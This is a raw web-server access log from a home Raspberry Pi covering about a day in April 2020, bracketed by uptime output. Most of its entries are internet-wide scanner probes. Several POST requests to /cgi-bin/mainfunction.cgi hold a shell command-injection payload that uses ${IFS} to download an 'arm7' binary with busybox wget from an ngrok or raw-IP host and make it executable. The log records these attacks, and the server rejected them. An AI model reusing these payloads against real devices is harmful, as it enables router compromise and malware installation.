Mon Apr  6 06:25:07 MDT 2020
 06:25:07 up 41 days, 10:53,  1 user,  load average: 0.49, 0.29, 0.28
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 41days 32:26   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE
5.189.176.208 - - [06/Apr/2020:14:22:57 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
189.232.27.21 - - [06/Apr/2020:14:26:02 +0000] "GET / HTTP/1.1" 400 0 "" ""
31.43.254.234 - - [06/Apr/2020:14:33:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
123.11.194.129 - - [06/Apr/2020:15:36:48 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World"
212.129.41.188 - - [06/Apr/2020:16:40:35 +0000] "GET / HTTP/1.1" 200 25000 "" ""
202.168.64.24 - - [06/Apr/2020:17:00:23 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
86.137.40.155 - - [06/Apr/2020:17:14:13 +0000] "GET / HTTP/1.1" 400 0 "" ""
93.99.41.100 - - [06/Apr/2020:18:13:54 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
93.99.41.100 - - [06/Apr/2020:18:13:54 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.105.0.135 - - [06/Apr/2020:18:45:56 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.107.47.215 - - [06/Apr/2020:18:45:57 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
95.138.228.28 - - [06/Apr/2020:18:46:51 +0000] "GET / HTTP/1.0" 200 25000 "https://dhtgame.site" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
208.91.109.18 - - [06/Apr/2020:19:08:27 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [06/Apr/2020:19:08:27 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
196.202.71.90 - - [06/Apr/2020:21:31:10 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
196.202.71.90 - - [06/Apr/2020:21:31:11 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
112.201.71.79 - - [06/Apr/2020:22:25:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
106.14.10.143 - - [06/Apr/2020:23:17:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0"
66.63.79.202 - - [06/Apr/2020:23:40:55 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
66.63.79.202 - - [06/Apr/2020:23:40:55 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.243.128.96 - - [06/Apr/2020:23:44:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
47.111.19.40 - - [07/Apr/2020:00:11:38 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
190.231.67.145 - - [07/Apr/2020:00:56:03 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
190.231.67.145 - - [07/Apr/2020:00:56:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
45.195.146.140 - - [07/Apr/2020:02:15:43 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36"
51.77.247.123 - - [07/Apr/2020:02:28:15 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.43"
51.77.247.123 - - [07/Apr/2020:02:28:15 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/6.43"
118.69.66.79 - - [07/Apr/2020:02:30:30 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
118.69.66.79 - - [07/Apr/2020:02:30:32 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.173.35.33 - - [07/Apr/2020:02:33:56 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
37.233.60.56 - - [07/Apr/2020:02:37:19 +0000] "GET / HTTP/1.1" 400 0 "" ""
171.67.70.85 - - [07/Apr/2020:02:56:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
5.196.65.85 - - [07/Apr/2020:03:49:45 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
149.129.175.17 - - [07/Apr/2020:03:56:55 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
149.129.175.17 - - [07/Apr/2020:03:56:59 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:01 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:01 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:02 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:02 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:03 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:03 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:04 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
149.129.175.17 - - [07/Apr/2020:03:57:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
189.1.163.207 - - [07/Apr/2020:04:53:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
61.219.11.153 - - [07/Apr/2020:06:06:48 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
85.93.20.62 - - [07/Apr/2020:06:10:02 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
169.197.108.38 - - [07/Apr/2020:06:17:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
201.246.67.143 - - [07/Apr/2020:06:22:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.205.50.3 - - [07/Apr/2020:06:32:22 +0000] "GET /is-sending%3C%7C%3EC:/AAAA HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
187.102.54.165 - - [07/Apr/2020:06:37:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
165.22.84.3 - - [07/Apr/2020:06:55:52 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
165.22.84.3 - - [07/Apr/2020:06:56:19 +0000] "GET /scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
165.22.84.3 - - [07/Apr/2020:06:56:47 +0000] "GET /db/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
165.22.84.3 - - [07/Apr/2020:06:57:14 +0000] "GET /admin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
165.22.84.3 - - [07/Apr/2020:06:57:42 +0000] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
213.128.88.99 - - [07/Apr/2020:07:25:50 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
212.98.173.201 - - [07/Apr/2020:08:38:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.8.10.202 - - [07/Apr/2020:09:03:36 +0000] "GET /xaa HTTP/1.1" 404 0 "" "Go-http-client/1.1"
5.188.210.101 - - [07/Apr/2020:10:12:17 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [07/Apr/2020:10:12:22 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [07/Apr/2020:10:12:28 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [07/Apr/2020:10:14:32 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [07/Apr/2020:10:14:38 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [07/Apr/2020:10:14:44 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
5.188.210.101 - - [07/Apr/2020:10:15:26 +0000] "GET /echo.php HTTP/1.1" 404 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
54.36.49.151 - - [07/Apr/2020:10:16:58 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
103.83.5.41 - - [07/Apr/2020:10:34:26 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
192.241.238.216 - - [07/Apr/2020:10:51:53 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
47.111.19.40 - - [07/Apr/2020:11:31:51 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
Tue Apr  7 06:25:05 MDT 2020
 06:25:06 up 42 days, 10:53,  1 user,  load average: 0.58, 0.34, 0.28
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 42days 33:02   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE